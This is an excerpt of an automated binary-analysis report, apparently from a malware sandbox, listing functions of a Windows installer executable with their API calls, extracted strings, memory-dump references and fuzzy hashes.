SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 004B1F57

Strings

Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 004B1EE6
l?P, xrefs: 004B1F2F
Failed to create DebugClientWnd, xrefs: 004B1F20

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd$l?P
API String ID: 3850602802-850641457
Opcode ID: 9ae9edecfd1b412e9d3b9282ceb9769c22c66a4cf1d9b052bc9a92a10b209aaa
Instruction ID: 5cb4ff35a8ed3dae1f69dde1b4f306a5bded618f166fc975eee933eb53613759
Opcode Fuzzy Hash: 9ae9edecfd1b412e9d3b9282ceb9769c22c66a4cf1d9b052bc9a92a10b209aaa
Instruction Fuzzy Hash: E81127B06043429FF710AB28DC91B9F37D4AB55318F40442AFA84CB3A2D7B88C04C77A

Uniqueness

Uniqueness Score: -1.00%

Function 0047D228, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0047D23C
GetWindowLongW.USER32(00000000,000000EC), ref: 0047D27E
SetWindowLongW.USER32 ref: 0047D28F
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,-00000001,00000000,?,0047D349,?,?,?,00000000), ref: 0047D2B7

Strings

<*G, xrefs: 0047D22F, 0047D257, 0047D2AA, 0047D271, 0047D28B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$Visible
String ID: <*G
API String ID: 2967648141-1440996861
Opcode ID: b93ad06817a46b1853e4508348062faf2b4d6efccd7daebd0d5d7e1855421084
Instruction ID: 74c0ac49814f6f16f5a16242ba7835f76b82a1a36174a1016be96195002fb6ca
Opcode Fuzzy Hash: b93ad06817a46b1853e4508348062faf2b4d6efccd7daebd0d5d7e1855421084
Instruction Fuzzy Hash: 0B118231625654AFDB01DB68D848EE93BE8AB09354F0441A2F988CB3A2C239DD45C759

Uniqueness

Uniqueness Score: -1.00%

Function 004B2F50, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32 ref: 004B2F82
GetExitCodeProcess.KERNEL32 ref: 004B2FA5
CloseHandle.KERNEL32(?,004B2FD8,00000001,00000000,000000FF,000000FF,00000000,004B2FD1), ref: 004B2FCB

Strings

GetExitCodeProcess, xrefs: 004B2FAE
MsgWaitForMultipleObjects, xrefs: 004B2F91

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCodeExitHandleMultipleObjectsProcessWait
String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
API String ID: 2573145106-3235461205
Opcode ID: c2a3477fb1c507eca4eda6d83c517cac77042463e8fcf6934c11353e6308bac5
Instruction ID: f9c96adb5db76e043f36f85f413a9ba826dccd1782af7b4d783150c9fdb694e0
Opcode Fuzzy Hash: c2a3477fb1c507eca4eda6d83c517cac77042463e8fcf6934c11353e6308bac5
Instruction Fuzzy Hash: 7D018430604204AFDB21EBA9CD41AAE73B8EB4A724F504576F910D77D1D6B89D40E629

Uniqueness

Uniqueness Score: -1.00%

Function 004AE821, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45fileCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000000,00000020), ref: 004AE82E
DeleteFileW.KERNEL32(00000000,00000000,00000020), ref: 004AE83C
MoveFileW.KERNEL32(00000000,00000000), ref: 004AE85F

Part of subcall function 004ADC34: GetLastError.KERNEL32(00000000,004AE8EE,00000005,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000,004FE286), ref: 004ADC37

Strings

DeleteFile, xrefs: 004AE84B
MoveFile, xrefs: 004AE868

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesDeleteErrorLastMove
String ID: DeleteFile$MoveFile
API String ID: 3024442154-139070271
Opcode ID: 67a93e20512ab7d3c48e5b2d7634e6a2ee4abb9aead1ef70966b2b708f0bba7f
Instruction ID: a14352d00bb1c26c699235b1054e29f78f0f7873118da63199c57f037ee0bb5e
Opcode Fuzzy Hash: 67a93e20512ab7d3c48e5b2d7634e6a2ee4abb9aead1ef70966b2b708f0bba7f
Instruction Fuzzy Hash: F5F08171A182058ADB00FBB7984266E62D8EB6630CF61443BB415E36C3DA3DDC11822D

Uniqueness

Uniqueness Score: -1.00%

Function 00406F50, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,0040DD01,004D94A0,00000000,004D957C,?,00000000,004D959E), ref: 00406F87
SetCurrentDirectoryW.KERNEL32(?,00000105,?,?,?,0040DD01,004D94A0,00000000,004D957C,?,00000000,004D959E), ref: 00406F8D
GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,0040DD01,004D94A0,00000000,004D957C,?,00000000,004D959E), ref: 00406F9C
SetCurrentDirectoryW.KERNEL32(?,00000105,?,?,?,0040DD01,004D94A0,00000000,004D957C,?,00000000,004D959E), ref: 00406FAD

Strings

:, xrefs: 00406F6C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 1f1dfc061f7ce5fba94a525a68724fe0d7d7d2d3a1c0c8f4a9b96ff4fc67da8a
Instruction ID: 2a2578a9873e554637340ad988b15cacb881584caf9c4433a20746dd45dae6f2
Opcode Fuzzy Hash: 1f1dfc061f7ce5fba94a525a68724fe0d7d7d2d3a1c0c8f4a9b96ff4fc67da8a
Instruction Fuzzy Hash: D8F024751403416AD310E7A08892AEB73DCEF44308F00883FBAC8D72E1E77C8958836B

Uniqueness

Uniqueness Score: -1.00%

Function 004809D8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00503F6C,004B1F3E,004B2358,004B1E94,00000000,00000B06,00000000,00000000), ref: 004809F1

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

InterlockedExchange.KERNEL32(0050B1B0,00000001), ref: 00480A08

Part of subcall function 00480944: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,00480A2C,00000004,00503F6C,004B1F3E,004B2358,004B1E94,00000000,00000B06,00000000,00000000), ref: 0048095A
Part of subcall function 00480944: InterlockedExchange.KERNEL32(0050B1A8,00000001), ref: 00480971

ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00503F6C,004B1F3E,004B2358,004B1E94,00000000,00000B06,00000000,00000000), ref: 00480A1C

Strings

user32.dll, xrefs: 004809EC
ChangeWindowMessageFilterEx, xrefs: 004809E7

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExchangeHandleInterlockedModule$AddressChangeFilterMessageProcWindow
String ID: ChangeWindowMessageFilterEx$user32.dll
API String ID: 203963768-2676053874
Opcode ID: c25bf230996ddfe7fde163834d50b520b5fde32b4ade4cb83102c35b07176e3b
Instruction ID: fed4213dc60b6a53fb0c0dc2d18e3eb25aa48b0ac894b788902a48676d7ec295
Opcode Fuzzy Hash: c25bf230996ddfe7fde163834d50b520b5fde32b4ade4cb83102c35b07176e3b
Instruction Fuzzy Hash: 02E092717613146AF65477B56CDAF9E22689BA4719F10483BF100A12D3D3BD0C48D35C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D4FC, Relevance: 7.8, APIs: 5, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1bc276161b077b3f35d4ec6113939ce3098cb1e782e101673e1e12522c82151
Instruction ID: b8cf1d3c093d4cfb9e422b9652eec8a78842bacad82b6ae9f5ec372978fd3a80
Opcode Fuzzy Hash: f1bc276161b077b3f35d4ec6113939ce3098cb1e782e101673e1e12522c82151
Instruction Fuzzy Hash: 85D1C3B5E00109EFCB00EF95C4819FEBBB6EF48314F5540A7E840A7251D738AE86DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00472CF4, Relevance: 7.7, APIs: 5, Instructions: 181COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000000,?,00000000), ref: 00472DC7
MulDiv.KERNEL32(?,00000000,00000000), ref: 00472E56
MulDiv.KERNEL32(?,00000000,00000000), ref: 00472E85
MulDiv.KERNEL32(?,00000000,00000000), ref: 00472EB4
MulDiv.KERNEL32(?,00000000,00000000), ref: 00472ED7

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2197b12eedfb51950ab1bc656f6f1be6f3e913ff71d99cb144d58ea26ebec8c4
Instruction ID: e3bef70ded846c04862a87e0df29dfab198a40cc4286244209955e0b984a1145
Opcode Fuzzy Hash: 2197b12eedfb51950ab1bc656f6f1be6f3e913ff71d99cb144d58ea26ebec8c4
Instruction Fuzzy Hash: 3781C734A00148EFDB04DB99C689E9EB7F5BB48304F2581F5E808DB362DB74AE44EB44

Uniqueness

Uniqueness Score: -1.00%

Function 0046A0B0, Relevance: 7.7, APIs: 5, Instructions: 178COMMON

Download Yara Rule

APIs

Part of subcall function 00431E8C: FillRect.USER32 ref: 00431EB5

CreateRectRgn.GDI32(?,?,?,?), ref: 0046A11C
SelectObject.GDI32(00000000,?), ref: 0046A137

Part of subcall function 0043170C: CreateBrushIndirect.GDI32(?), ref: 004317B7

FrameRgn.GDI32(00000000,?,00000000,00000001,00000001), ref: 0046A189
SelectObject.GDI32(00000000,?), ref: 0046A2C9
DeleteObject.GDI32(?), ref: 0046A2D2

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateRectSelect$BrushDeleteFillFrameIndirect
String ID:
API String ID: 3847799725-0
Opcode ID: 7624949f4bee1d9fbf7e1313e49e8b7fcdeebbb2a4a8f6aed500fb80bf5d33c4
Instruction ID: bf6ecd47775ece5d0b767befde189b2c173e02802fb0a6363b6c4df03a31015e
Opcode Fuzzy Hash: 7624949f4bee1d9fbf7e1313e49e8b7fcdeebbb2a4a8f6aed500fb80bf5d33c4
Instruction Fuzzy Hash: CD71B435A0050AEFCB00DFA9C985EDEB3F9BF09304F1140A6F914AB262D775AE06DB55

Uniqueness

Uniqueness Score: -1.00%

Function 004251C4, Relevance: 7.6, APIs: 5, Instructions: 142COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,00425366), ref: 00425224
CharNextW.USER32(?,?,00000000,00425366), ref: 004252CC
CharNextW.USER32(?,?,00000000,00425366), ref: 004252F1
CharNextW.USER32(00000000,?,?,00000000,00425366), ref: 00425309

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 8c70209c64ea5f4b1fefbd18c905afcb8817ef95ff3678df491eb711504daece
Instruction ID: 039948a37cc9e478bb089503868b010f7a8e31320ffe479a416377353a365109
Opcode Fuzzy Hash: 8c70209c64ea5f4b1fefbd18c905afcb8817ef95ff3678df491eb711504daece
Instruction Fuzzy Hash: F8515C30B04A24DFCF11EFA9E480A5977B1EF06354F8111E6E801DB3A5DB78AE81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00460EBC, Relevance: 7.6, APIs: 5, Instructions: 126COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 00460EE7
SaveDC.GDI32(00000000), ref: 00460F20
ExcludeClipRect.GDI32(00000000,?,?,?,?,00000000,00460FDE,?,00000000,0046101B), ref: 00460FA2
RestoreDC.GDI32(00000000,?), ref: 00460FD8
EndPaint.USER32(00000000,?,00461022), ref: 00461015

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: af9f1a8401d38bfd6883625a2123b92d566b98a576f3a69a0e993ffc0c0bdfe0
Instruction ID: 826c0ccb743ca4c6f701f426c5c07c7349eaa674ccdd9abd436e2e436901cf3c
Opcode Fuzzy Hash: af9f1a8401d38bfd6883625a2123b92d566b98a576f3a69a0e993ffc0c0bdfe0
Instruction Fuzzy Hash: D2414170A042489FDB18CF98C555FAFB7F4FB48304F1544AAE944973A2E7B99D40CB19

Uniqueness

Uniqueness Score: -1.00%

Function 004D56BC, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 112COMMON

Download Yara Rule

APIs

Part of subcall function 00480EA4: GetTickCount.KERNEL32 ref: 00480EAA

Part of subcall function 00480C94: MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,00480D3B,?,?,?,?,00000000), ref: 00480CCA

GetLastError.KERNEL32(00000000,004D5828,?,?,0050BE1C,00000000), ref: 004D571E

Strings

, xrefs: 004D574B, 004D575B
MoveFileEx, xrefs: 004D5764
LoggedMsgBox returned an unexpected value. Assuming Cancel., xrefs: 004D57DF
;fM, xrefs: 004D57A2, 004D57AA

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CountErrorFileLastMoveTick
String ID: $;fM$LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
API String ID: 2406187244-3162414171
Opcode ID: 076af6c119355a12ede8e518fe54972337c98e95638896a1b374ea9b42e08665
Instruction ID: 1561db2fc2b3ff047bb944d33984a8e9191f63a04a3a40f09a5ec673d8b2c597
Opcode Fuzzy Hash: 076af6c119355a12ede8e518fe54972337c98e95638896a1b374ea9b42e08665
Instruction Fuzzy Hash: E741C670D006088FDB10FFA9C892AEE77B5EF48304F21853BF914A7351DB3899508BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00471AA8, Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471AE6
FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471B17
FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471B48
FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471B79
FlatSB_SetScrollProp.COMCTL32(00000000,?,00000000,00000000,00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471BA7

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FlatPropScroll
String ID:
API String ID: 3625857538-0
Opcode ID: 7025696679e20e813f48477b34f506e8f3d64abe4bd871a10f53aaffbcb3a6cd
Instruction ID: 8a1a06fec9130dbae4499fe5a78f0dd192bb88b1e33e491d0ebb219a8291d13c
Opcode Fuzzy Hash: 7025696679e20e813f48477b34f506e8f3d64abe4bd871a10f53aaffbcb3a6cd
Instruction Fuzzy Hash: F831E2706000949FD750DF9ED882F1577E8AF2D309B15089AF288DB362D73AEE64DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0044E254, Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0389341839b713f552b0060847668c986b048af33998209091a73a8017c9c40e
Instruction ID: 30c546c28b0b3f10370e633a50cd866ef923edf63333ce4bf924fae17ea87c24
Opcode Fuzzy Hash: 0389341839b713f552b0060847668c986b048af33998209091a73a8017c9c40e
Instruction Fuzzy Hash: 6211A220B447495AFB216F3B8805B6BA798BF51749F04416FBC819B383CBBDDC06869D

Uniqueness

Uniqueness Score: -1.00%

Function 004D3024, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(0050BE1C,00000000,00000000,004D3107,?,?,0050BE1C,00000000), ref: 004D30C0
GetLastError.KERNEL32(0050BE1C,00000000,00000000,004D3107,?,?,0050BE1C,00000000), ref: 004D30D6

Strings

Setting permissions on registry key: %s\%s, xrefs: 004D307A
Failed to set permissions on registry key (%d)., xrefs: 004D30E7
Could not set permissions on the registry key because it currently does not exist., xrefs: 004D30CA

Memory Dump Source

